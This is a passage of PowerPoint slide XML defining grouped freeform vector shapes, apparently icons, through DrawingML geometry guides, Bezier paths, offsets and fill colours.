                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0492523F-F823-464B-B019-06C1191576C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574" y="1758"/>
                  <a:ext cx="381" cy="920"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 794"/>
                    <a:gd name="T1" fmla="*/ 213 h 1916"/>
                    <a:gd name="T2" fmla="*/ 0 w 794"/>
                    <a:gd name="T3" fmla="*/ 1916 h 1916"/>
                    <a:gd name="T4" fmla="*/ 794 w 794"/>
                    <a:gd name="T5" fmla="*/ 1703 h 1916"/>
                    <a:gd name="T6" fmla="*/ 794 w 794"/>
                    <a:gd name="T7" fmla="*/ 0 h 1916"/>
                    <a:gd name="T8" fmla="*/ 0 w 794"/>
                    <a:gd name="T9" fmla="*/ 213 h 19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94" h="1916">
                      <a:moveTo>
                        <a:pt x="0" y="213"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1916"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="794" y="1703"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="794" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="213"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="B6B6B6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24" name="Freeform 1158">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90FE5E20-6AC6-4B09-B1EB-1548BB79840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12" y="2228"/>
                  <a:ext cx="27" cy="35"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 73"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 14 h 73"/>
                    <a:gd name="T4" fmla="*/ 0 w 57"/>
                    <a:gd name="T5" fmla="*/ 73 h 73"/>
                    <a:gd name="T6" fmla="*/ 26 w 57"/>
                    <a:gd name="T7" fmla="*/ 66 h 73"/>
                    <a:gd name="T8" fmla="*/ 26 w 57"/>
                    <a:gd name="T9" fmla="*/ 26 h 73"/>
                    <a:gd name="T10" fmla="*/ 57 w 57"/>
                    <a:gd name="T11" fmla="*/ 19 h 73"/>
                    <a:gd name="T12" fmla="*/ 57 w 57"/>
                    <a:gd name="T13" fmla="*/ 0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73">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="14"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="66"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="19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25" name="Freeform 1159">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{982ADCEC-ABE7-4501-A050-4E93C9BBE03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547" y="1841"/>
                  <a:ext cx="27" cy="843"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 1755"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 817 h 1755"/>
                    <a:gd name="T4" fmla="*/ 0 w 57"/>
                    <a:gd name="T5" fmla="*/ 817 h 1755"/>
                    <a:gd name="T6" fmla="*/ 0 w 57"/>
                    <a:gd name="T7" fmla="*/ 817 h 1755"/>
                    <a:gd name="T8" fmla="*/ 0 w 57"/>
                    <a:gd name="T9" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T10" fmla="*/ 0 w 57"/>
                    <a:gd name="T11" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T12" fmla="*/ 0 w 57"/>
                    <a:gd name="T13" fmla="*/ 1285 h 1755"/>
                    <a:gd name="T14" fmla="*/ 0 w 57"/>
                    <a:gd name="T15" fmla="*/ 1755 h 1755"/>
                    <a:gd name="T16" fmla="*/ 57 w 57"/>
                    <a:gd name="T17" fmla="*/ 1738 h 1755"/>
                    <a:gd name="T18" fmla="*/ 57 w 57"/>
                    <a:gd name="T19" fmla="*/ 47 h 1755"/>
                    <a:gd name="T20" fmla="*/ 0 w 57"/>
                    <a:gd name="T21" fmla="*/ 0 h 1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7" h="1755">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="817"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1285"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1755"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="1738"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="4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26" name="Freeform 1160">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F1342D-2A6F-4232-AB3C-50448A51848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547" y="1723"/>
                  <a:ext cx="434" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 851 w 905"/>
                    <a:gd name="T1" fmla="*/ 14 h 288"/>
                    <a:gd name="T2" fmla="*/ 0 w 905"/>
                    <a:gd name="T3" fmla="*/ 241 h 288"/>
                    <a:gd name="T4" fmla="*/ 57 w 905"/>
                    <a:gd name="T5" fmla="*/ 288 h 288"/>
                    <a:gd name="T6" fmla="*/ 851 w 905"/>
                    <a:gd name="T7" fmla="*/ 76 h 288"/>
                    <a:gd name="T8" fmla="*/ 905 w 905"/>
                    <a:gd name="T9" fmla="*/ 0 h 288"/>
                    <a:gd name="T10" fmla="*/ 851 w 905"/>
                    <a:gd name="T11" fmla="*/ 14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05" h="288">
                      <a:moveTo>
                        <a:pt x="851" y="14"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="57" y="288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="851" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="905" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="851" y="14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27" name="Freeform 1161">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A1B228-FEF7-4A63-8221-82C48A51E98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955" y="1722"/>
                  <a:ext cx="26" cy="852"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 54"/>
                    <a:gd name="T1" fmla="*/ 75 h 1774"/>
                    <a:gd name="T2" fmla="*/ 0 w 54"/>
                    <a:gd name="T3" fmla="*/ 838 h 1774"/>
                    <a:gd name="T4" fmla="*/ 0 w 54"/>
                    <a:gd name="T5" fmla="*/ 838 h 1774"/>
                    <a:gd name="T6" fmla="*/ 0 w 54"/>
                    <a:gd name="T7" fmla="*/ 838 h 1774"/>
                    <a:gd name="T8" fmla="*/ 0 w 54"/>
                    <a:gd name="T9" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T10" fmla="*/ 0 w 54"/>
                    <a:gd name="T11" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T12" fmla="*/ 0 w 54"/>
                    <a:gd name="T13" fmla="*/ 1306 h 1774"/>
                    <a:gd name="T14" fmla="*/ 0 w 54"/>
                    <a:gd name="T15" fmla="*/ 1774 h 1774"/>
                    <a:gd name="T16" fmla="*/ 54 w 54"/>
                    <a:gd name="T17" fmla="*/ 1760 h 1774"/>
                    <a:gd name="T18" fmla="*/ 54 w 54"/>
                    <a:gd name="T19" fmla="*/ 0 h 1774"/>
                    <a:gd name="T20" fmla="*/ 0 w 54"/>
                    <a:gd name="T21" fmla="*/ 75 h 17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4" h="1774">
                      <a:moveTo>
                        <a:pt x="0" y="75"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="838"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1306"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1774"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="1760"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="54" y="0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18" name="Group 1012">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B328EEB8-1D2E-49AC-B48B-366C5DE1AA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54673" y="2823454"/>
              <a:ext cx="386060" cy="356062"/>
              <a:chOff x="1217" y="1980"/>
              <a:chExt cx="433" cy="398"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="1882" name="Group 1013">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BA5785-B1D7-4603-A8E7-46BF272244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49" y="2002"/>
                <a:ext cx="155" cy="313"/>
                <a:chOff x="1155" y="1032"/>
                <a:chExt cx="313" cy="629"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1916" name="Freeform 1014">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B668A7-10AE-4160-80C9-E87C88A12D6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297" y="1336"/>
                  <a:ext cx="120" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 89 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 2 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 43 w 90"/>
                    <a:gd name="T17" fmla="*/ 205 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 40 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 43 w 90"/>
                    <a:gd name="T25" fmla="*/ 205 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="141"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="89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  <a:cubicBezTo>
                        <a:pt x="55" y="20"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="4" y="5"/>
                        <a:pt x="2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5"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="171"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="47"/>
                        <a:pt x="36" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="47"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="171"/>
                        <a:pt x="43" y="205"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="207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17" name="Freeform 1015">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096AFE46-A06A-4F60-B3DD-FABEDEBA8D94}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1155" y="1118"/>
                  <a:ext cx="313" cy="258"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 235 w 236"/>
                    <a:gd name="T1" fmla="*/ 114 h 194"/>
                    <a:gd name="T2" fmla="*/ 235 w 236"/>
                    <a:gd name="T3" fmla="*/ 114 h 194"/>
                    <a:gd name="T4" fmla="*/ 225 w 236"/>
                    <a:gd name="T5" fmla="*/ 49 h 194"/>
                    <a:gd name="T6" fmla="*/ 199 w 236"/>
                    <a:gd name="T7" fmla="*/ 24 h 194"/>
                    <a:gd name="T8" fmla="*/ 156 w 236"/>
                    <a:gd name="T9" fmla="*/ 13 h 194"/>
                    <a:gd name="T10" fmla="*/ 116 w 236"/>
                    <a:gd name="T11" fmla="*/ 2 h 194"/>
                    <a:gd name="T12" fmla="*/ 86 w 236"/>
                    <a:gd name="T13" fmla="*/ 12 h 194"/>
                    <a:gd name="T14" fmla="*/ 73 w 236"/>
                    <a:gd name="T15" fmla="*/ 86 h 194"/>
                    <a:gd name="T16" fmla="*/ 73 w 236"/>
                    <a:gd name="T17" fmla="*/ 86 h 194"/>
                    <a:gd name="T18" fmla="*/ 72 w 236"/>
                    <a:gd name="T19" fmla="*/ 91 h 194"/>
                    <a:gd name="T20" fmla="*/ 21 w 236"/>
                    <a:gd name="T21" fmla="*/ 104 h 194"/>
                    <a:gd name="T22" fmla="*/ 26 w 236"/>
                    <a:gd name="T23" fmla="*/ 135 h 194"/>
                    <a:gd name="T24" fmla="*/ 80 w 236"/>
                    <a:gd name="T25" fmla="*/ 122 h 194"/>
                    <a:gd name="T26" fmla="*/ 80 w 236"/>
                    <a:gd name="T27" fmla="*/ 122 h 194"/>
                    <a:gd name="T28" fmla="*/ 86 w 236"/>
                    <a:gd name="T29" fmla="*/ 120 h 194"/>
                    <a:gd name="T30" fmla="*/ 99 w 236"/>
                    <a:gd name="T31" fmla="*/ 112 h 194"/>
                    <a:gd name="T32" fmla="*/ 104 w 236"/>
                    <a:gd name="T33" fmla="*/ 92 h 194"/>
                    <a:gd name="T34" fmla="*/ 104 w 236"/>
                    <a:gd name="T35" fmla="*/ 92 h 194"/>
                    <a:gd name="T36" fmla="*/ 110 w 236"/>
                    <a:gd name="T37" fmla="*/ 47 h 194"/>
                    <a:gd name="T38" fmla="*/ 109 w 236"/>
                    <a:gd name="T39" fmla="*/ 167 h 194"/>
                    <a:gd name="T40" fmla="*/ 118 w 236"/>
                    <a:gd name="T41" fmla="*/ 178 h 194"/>
                    <a:gd name="T42" fmla="*/ 169 w 236"/>
                    <a:gd name="T43" fmla="*/ 192 h 194"/>
                    <a:gd name="T44" fmla="*/ 196 w 236"/>
                    <a:gd name="T45" fmla="*/ 173 h 194"/>
                    <a:gd name="T46" fmla="*/ 196 w 236"/>
                    <a:gd name="T47" fmla="*/ 160 h 194"/>
                    <a:gd name="T48" fmla="*/ 216 w 236"/>
                    <a:gd name="T49" fmla="*/ 155 h 194"/>
                    <a:gd name="T50" fmla="*/ 219 w 236"/>
                    <a:gd name="T51" fmla="*/ 154 h 194"/>
                    <a:gd name="T52" fmla="*/ 232 w 236"/>
                    <a:gd name="T53" fmla="*/ 146 h 194"/>
                    <a:gd name="T54" fmla="*/ 236 w 236"/>
                    <a:gd name="T55" fmla="*/ 124 h 194"/>
                    <a:gd name="T56" fmla="*/ 235 w 236"/>
                    <a:gd name="T57" fmla="*/ 114 h 194"/>
                    <a:gd name="T58" fmla="*/ 192 w 236"/>
                    <a:gd name="T59" fmla="*/ 75 h 194"/>
                    <a:gd name="T60" fmla="*/ 194 w 236"/>
                    <a:gd name="T61" fmla="*/ 88 h 194"/>
                    <a:gd name="T62" fmla="*/ 200 w 236"/>
                    <a:gd name="T63" fmla="*/ 123 h 194"/>
                    <a:gd name="T64" fmla="*/ 196 w 236"/>
                    <a:gd name="T65" fmla="*/ 124 h 194"/>
                    <a:gd name="T66" fmla="*/ 194 w 236"/>
                    <a:gd name="T67" fmla="*/ 88 h 194"/>
                    <a:gd name="T68" fmla="*/ 192 w 236"/>
                    <a:gd name="T69" fmla="*/ 75 h 194"/>
                    <a:gd name="T70" fmla="*/ 192 w 236"/>
                    <a:gd name="T71" fmla="*/ 71 h 194"/>
                    <a:gd name="T72" fmla="*/ 192 w 236"/>
                    <a:gd name="T73" fmla="*/ 75 h 1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6" h="194">
                      <a:moveTo>
                        <a:pt x="235" y="114"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                        <a:pt x="235" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="230" y="85"/>
                        <a:pt x="226" y="57"/>
                        <a:pt x="225" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="222" y="32"/>
                        <a:pt x="207" y="27"/>
                        <a:pt x="199" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="21"/>
                        <a:pt x="169" y="16"/>
                        <a:pt x="156" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="9"/>
                        <a:pt x="125" y="3"/>
                        <a:pt x="116" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="0"/>
                        <a:pt x="89" y="4"/>
                        <a:pt x="86" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="14"/>
                        <a:pt x="79" y="50"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                        <a:pt x="73" y="86"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                        <a:pt x="72" y="91"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="96"/>
                        <a:pt x="28" y="103"/>
                        <a:pt x="21" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="109"/>
                        <a:pt x="9" y="137"/>
                        <a:pt x="26" y="135"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="135"/>
                        <a:pt x="55" y="129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6" y="120"/>
                        <a:pt x="86" y="120"/>
                        <a:pt x="86" y="120"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="92" y="118"/>
                        <a:pt x="96" y="116"/>
                        <a:pt x="99" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="102" y="108"/>
                        <a:pt x="104" y="102"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                        <a:pt x="104" y="92"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="107" y="65"/>
                        <a:pt x="110" y="43"/>
                        <a:pt x="110" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="53"/>
                        <a:pt x="109" y="125"/>
                        <a:pt x="109" y="167"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="172"/>
                        <a:pt x="112" y="177"/>
                        <a:pt x="118" y="178"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="180"/>
                        <a:pt x="162" y="190"/>
                        <a:pt x="169" y="192"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="177" y="194"/>
                        <a:pt x="193" y="184"/>
                        <a:pt x="196" y="173"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="171"/>
                        <a:pt x="196" y="162"/>
                        <a:pt x="196" y="160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="158"/>
                        <a:pt x="208" y="157"/>
                        <a:pt x="216" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="155"/>
                        <a:pt x="218" y="154"/>
                        <a:pt x="219" y="154"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="225" y="152"/>
                        <a:pt x="229" y="150"/>
                        <a:pt x="232" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="235" y="142"/>
                        <a:pt x="236" y="135"/>
                        <a:pt x="236" y="124"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="235" y="114"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="192" y="75"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="79"/>
                        <a:pt x="194" y="83"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="195" y="97"/>
                        <a:pt x="197" y="108"/>
                        <a:pt x="200" y="123"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="198" y="123"/>
                        <a:pt x="197" y="124"/>
                        <a:pt x="196" y="124"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="111"/>
                        <a:pt x="195" y="99"/>
                        <a:pt x="194" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="82"/>
                        <a:pt x="193" y="78"/>
                        <a:pt x="192" y="75"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="192" y="72"/>
                        <a:pt x="192" y="73"/>
                        <a:pt x="192" y="7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18" name="Freeform 1016">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2016F4C-0865-47D0-8CEC-E2E64792BE3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312" y="1102"/>
                  <a:ext cx="87" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29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6" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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19" name="Freeform 1017">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6146E39-905A-4203-845B-C494F1CEF7B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321" y="1281"/>
                  <a:ext cx="121" cy="72"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 75 w 91"/>
                    <a:gd name="T1" fmla="*/ 0 h 54"/>
                    <a:gd name="T2" fmla="*/ 27 w 91"/>
                    <a:gd name="T3" fmla="*/ 14 h 54"/>
                    <a:gd name="T4" fmla="*/ 40 w 91"/>
                    <a:gd name="T5" fmla="*/ 46 h 54"/>
                    <a:gd name="T6" fmla="*/ 91 w 91"/>
                    <a:gd name="T7" fmla="*/ 32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1" h="54">
                      <a:moveTo>
                        <a:pt x="75" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="4"/>
                        <a:pt x="45" y="9"/>
                        <a:pt x="27" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="22"/>
                        <a:pt x="17" y="54"/>
                        <a:pt x="40" y="46"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="44"/>
                        <a:pt x="65" y="38"/>
                        <a:pt x="91" y="32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20" name="Oval 1018">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0331C0D8-B104-4171-9273-CE93C4CACA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flipH="1">
                  <a:off x="1302" y="1032"/>
                  <a:ext cx="105" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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83" name="Group 1019">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71C00433-E5C7-4D68-AD83-4A0576F8F1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217" y="1980"/>
                <a:ext cx="155" cy="313"/>
                <a:chOff x="1155" y="1032"/>
                <a:chExt cx="313" cy="629"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1911" name="Freeform 1020">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08DC0B09-0D71-4EBE-89D0-F75CBD90388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297" y="1336"/>
                  <a:ext cx="120" cy="325"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 89 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 2 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
